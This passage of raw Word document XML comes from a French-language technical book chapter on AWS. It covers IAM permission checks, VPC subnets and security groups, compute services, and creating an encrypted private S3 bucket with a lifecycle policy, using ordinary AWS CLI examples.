        <w:br/>
        <w:t xml:space="preserve">      "Resource": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "arn:aws:s3:::mon-site-assets",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "arn:aws:s3:::mon-site-assets/images/*"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Qui suis-je et quels droits ai-je ?</w:t>
        <w:br/>
        <w:t>aws sts get-caller-identity</w:t>
        <w:br/>
        <w:t>aws iam list-attached-user-policies --user-name alice</w:t>
        <w:br/>
        <w:t>aws iam simulate-principal-policy \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --policy-source-arn arn:aws:iam::123456789012:user/alice \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --action-names s3:PutObject \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --resource-arns arn:aws:s3:::mon-site-assets/test.txt</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RÔLE ASSUMABLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Identité temporaire obtenue par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sts:AssumeRole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, avec des identifiants valables de quelques minutes à quelques heures. Elle évite les clés d'accès permanentes.</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UNE CLÉ D'ACCÈS DANS UN DÉPÔT PUBLIC EST UNE COMPROMISSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Les robots d'analyse trouvent une clé AWS en quelques minutes. Utilisez des rôles, des identités de charge de travail, et activez la détection de secrets dans la CI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>71.2 VPC : un réseau isolé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un VPC délimite un réseau. Les sous-réseaux publics ont une route vers la passerelle Internet ; les privés sortent par une passerelle NAT ou des points de terminaison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="83" name="Picture 83"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f81.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.81 — Un VPC minimal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes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Créer un VPC avec deux sous-réseaux</w:t>
        <w:br/>
        <w:t>VPC=$(aws ec2 create-vpc --cidr-block 10.0.0.0/16 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query 'Vpc.VpcId' --output text)</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 create-subnet --vpc-id $VPC --cidr-block 10.0.1.0/24 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --availability-zone eu-west-3a --query 'Subnet.SubnetId' --output text</w:t>
        <w:br/>
        <w:t>aws ec2 create-subnet --vpc-id $VPC --cidr-block 10.0.11.0/24 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --availability-zone eu-west-3b --query 'Subnet.SubnetId' --output text</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 modify-vpc-attribute --vpc-id $VPC --enable-dns-hostnames</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.263 — Cinq éléments réseau</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96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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Table de routage</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Dirige le trafic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une par sous-réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Passerelle Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>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Entrée et sortie publiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Coût horaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NAT</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Sortie des sous-réseaux privés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coût élevé au Go</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Groupe de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Pare-feu avec état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Pas de refus explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Liste de contrôle réseau</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Filtre sans état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter sauf besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux règles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Groupe de sécurité : autoriser HTTPS depuis Internet uniquement</w:t>
        <w:br/>
        <w:t>aws ec2 authorize-security-group-ingress \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --group-id sg-0123456789abcdef0 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --protocol tcp --port 443 --cidr 0.0.0.0/0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne jamais ouvrir 22/tcp à 0.0.0.0/0 sans restriction</w:t>
        <w:br/>
        <w:t># Préférer un accès via SSM Session Manager, sans port ouvert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>71.3 Calcul</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS propose une gamme étendue de services de calcul. Le choix dépend de la durée d'exécution, du modèle de trafic et du besoin de contrôle du système.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.264 — Cinq services de calcul</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28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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Adapté à</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EC2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Machine virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contrôle complet, charges stables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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ECS / Fargate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Conteneurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Services conteneurisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kubernetes managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Écosystème Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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Événements, charges irrégulières</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>App Runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plateforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service HTTP simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un lancement étiqueté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Lancer une instance avec un profil d'instance (sans clé)</w:t>
        <w:br/>
        <w:t>aws ec2 run-instances \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --image-id ami-0123456789abcdef0 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --instance-type t3.micro \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --iam-instance-profile Name=app-role \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --subnet-id subnet-0123456789abcdef0 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --security-group-ids sg-0123456789abcdef0 \</w:t>
        <w:br/>
        <w:t>--tag-specifications</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'ResourceType=instance,Tags=[{Key=Projet,Value=demo},{Key=Environnement,Value=test}]'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le profil d'instance remplace les clés d'accès sur la machine : le code lit des identifiants temporaires fournis par le service de métadonnées. Aucun secret n'est stocké sur le disque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>71.4 Stockage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S3 stocke des objets, pas des fichiers avec une hiérarchie réelle. Les classes de stockage et les politiques de cycle de vie déterminent le coût.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes de sécurisation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Créer un compartiment privé avec chiffrement</w:t>
        <w:br/>
        <w:t>aws s3api create-bucket --bucket mon-site-assets --region eu-west-3 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --create-bucket-configuration LocationConstraint=eu-west-3</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws s3api put-public-access-block --bucket mon-site-assets \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --public-access-block-configuration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws s3api put-bucket-encryption --bucket mon-site-assets \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --server-side-encryption-configuration \</w:t>
        <w:br/>
        <w:t>'{"Rules":[{"ApplyServerSideEncryptionByDefault":{"SSEAlgorithm":"AES256"}}]}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique de cycle de vie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Cycle de vie : archivage et suppression</w:t>
        <w:br/>
        <w:t>aws s3api put-bucket-lifecycle-configuration --bucket mon-site-assets \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --lifecycle-configuration '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "Rules": [{</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "ID": "archiver",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Filter": {"Prefix": "sauvegardes/"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Status": "Enabled",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Transitions": [{"Days": 30, "StorageClass": "STANDARD_IA"},</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      {"Days": 90, "StorageClass": "GLACIER"}],</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Expiration": {"Days": 365}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</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CLASSE DE STOCKAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Niveau de durabilité et de disponibilité d'un objet, avec un coût et un délai de récupération différents. Le choix par défaut est rarement le moins cher à long terme.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
